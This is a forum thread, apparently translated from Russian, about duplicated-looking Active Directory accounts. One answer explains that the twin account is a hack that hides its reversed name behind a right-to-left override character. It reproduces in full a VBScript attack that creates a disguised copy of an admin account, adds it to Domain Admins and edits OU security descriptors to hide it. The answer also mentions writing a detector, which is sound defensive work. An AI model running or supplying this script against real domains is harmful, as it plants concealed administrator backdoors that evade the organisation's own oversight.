Uncle Seryozha2014-05-06 16:28:15
Active Directory
Uncle Seryozha, 2014-05-06 16:28:15

Why are there duplicate Active directory accounts?

Why do accounts double?
What does this mean in terms of security?

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2 answer(s)
Vyacheslav Smirnov, 2014-05-14

If negative options are considered, then it is a hack.
The second account has the name g_nimdAceTmoC, + the first character indicates the reverse direction of the text.
This move is used to visually hide the presence of a new user in the access control list.
For more details, see the webinar Penetration
Testing in Microsoft Networks (Dmitry Evteev, Head of Security Analysis Department, Positive Technologies, 03/15/2012
14:00 )
update: January 17, 2015.
I read Exploit-db and found an article by Dmitry Evteev. Where is the script to create an account that looks like a double account.
Article in Russian:

On Error Resume Next
strAdminsamAccountName = "dmitry.ivanov"
strAdminsGroup = "Domain Admins"
strPassNewUser = "[email protected]"


Dim arrContainer(), i

Set objRootDSE = GetObject("LDAP://RootDSE")
strDomain = objRootDSE.Get("DefaultNamingContext")
Set objDomain = GetObject("LDAP://" & strDomain)

strAdminsamAccountNameDN = SearchDN("' WHERE objectCategory='user' AND samAccountName = '" & strAdminsamAccountName & "'")

If Not IsNull(strAdminsamAccountNameDN) Then
        Set objAdmin = GetObject("LDAP://" & strAdminsamAccountNameDN)
        Set objOU = GetObject(objAdmin.parent)

        Call EnumOUs(objOU)
        For j = i-1 To 0 Step-1
                if strContainer="" Then
                        strContainer = "OU=" & arrContainer(j) & strContainer
                        primaryContainer = strContainer
                        strContainer = "OU=" & arrContainer(j) & "," & strContainer
                End if
                Set objOUcreate = objDomain.Create("organizationalUnit", strContainer)
        Set objContainer = GetObject("LDAP://" & strContainer & "," & strDomain)
        Set objUserCreate = objContainer.Create("User", "cn=" & ChrW(8238) & StrReverse(objAdmin.displayName))
        objUserCreate.Put "sAMAccountName", ChrW(8238) & StrReverse(strAdminsamAccountName)
        On Error Resume Next
        objUserCreate.SetPassword strPassNewUser
        objUserCreate.Put "userAccountControl", 66048
        objUserCreate.Put "givenName", ChrW(8238) & StrReverse(objAdmin.givenName)
        objUserCreate.Put "sn", ChrW(8238) & StrReverse(objAdmin.sn)
        objUserCreate.Put "initials", ChrW(8238) & StrReverse(objAdmin.initials)
        On Error Resume Next
        objUserCreate.Put "showInAdvancedViewOnly", "TRUE"
        On Error Resume Next
        NewUserDN = "cn=" & ChrW(8238) & StrReverse(objAdmin.displayName) & "," & objContainer.distinguishedName
        strAdminsGroupDN = SearchDN("' WHERE objectCategory='group' AND samAccountName = '" & strAdminsGroup & "'")
        If Not IsNull(strAdminsGroupDN) Then
                Set objGroup = GetObject("LDAP://" & strAdminsGroupDN)
                objGroup.PutEx 4, "member", Array(strAdminsamAccountNameDN)
                objGroup.PutEx 3, "member", Array(NewUserDN)
        End If
        OUAddAce(primaryContainer & "," & strDomain)
End If

Function SearchDN(str)
        Set objConnection = CreateObject("ADODB.Connection")
        objConnection.Provider = "ADsDSOObject"
        objConnection.Open "Active Directory Provider"
        Set objCommand = CreateObject("ADODB.Command")
        Set objCommand.ActiveConnection = objConnection
        objCommand.Properties("Searchscope") = 2
        objCommand.CommandText = "SELECT distinguishedName FROM 'LDAP://" & strDomain & str
        Set objRecordSet = objCommand.Execute
        If Not objRecordSet.EOF Then
                SearchDN = objRecordSet.Fields("distinguishedName").Value
        End if
End Function

Sub EnumOUs(objChild)
        Dim objParent
        Set objParent = GetObject(objChild.Parent)
        If (objParent.Class = "organizationalUnit") Then
                ReDim Preserve arrContainer(i + 1)
                arrContainer(i) = objChild.ou
                Call EnumOUs(objParent)
                ReDim Preserve arrContainer(i + 1)
                arrContainer(i) = objChild.ou & ChrW(128)
        End If
End Sub

Function OUAddAce(OU)
        Dim objSdUtil, objSD, objDACL, objAce
        Set objOU = GetObject ("LDAP://" & OU)

        Set objSdUtil = GetObject(objOU.ADsPath)
        Set objSD = objSdUtil.Get("ntSecurityDescriptor")
        Set objDACL = objSD.DiscretionaryACL
        Set objAce = CreateObject("AccessControlEntry")

        objAce.Trustee = "Everyone"
        objAce.AceFlags = 2
        objAce.AceType = 6
        objAce.AccessMask = 16
        objAce.Flags = 1
        objAce.ObjectType = "{E48D0154-BCF8-11D1-8702-00C04FB96050}"
        objDacl.AddAce objAce

        objSD.DiscretionaryAcl = objDacl
        objSDUtil.Put "ntSecurityDescriptor", Array(objSD)
        Set objNtSecurityDescriptor = objOU.Get("ntSecurityDescriptor")
        intNtSecurityDescriptorControl = objNtSecurityDescriptor.Control
        intNtSecurityDescriptorControl = intNtSecurityDescriptorControl Xor &H1000
        objNtSecurityDescriptor.Control = intNtSecurityDescriptorControl
        objOU.Put "ntSecurityDescriptor", objNtSecurityDescriptor
End Function

Tomorrow I'll sit and think with a fresh mind. How to write a reverse script. Detects accounts with the character ChrW(8238) in the name. I think it's easy to make such a script. But to test the operation of such a checker, you will need a test domain in which "double" records will be created.

Pavel Vasterov, 2014-05-08

What is this for? OO Uchetka
is not a name, it is a SID (without going into details)

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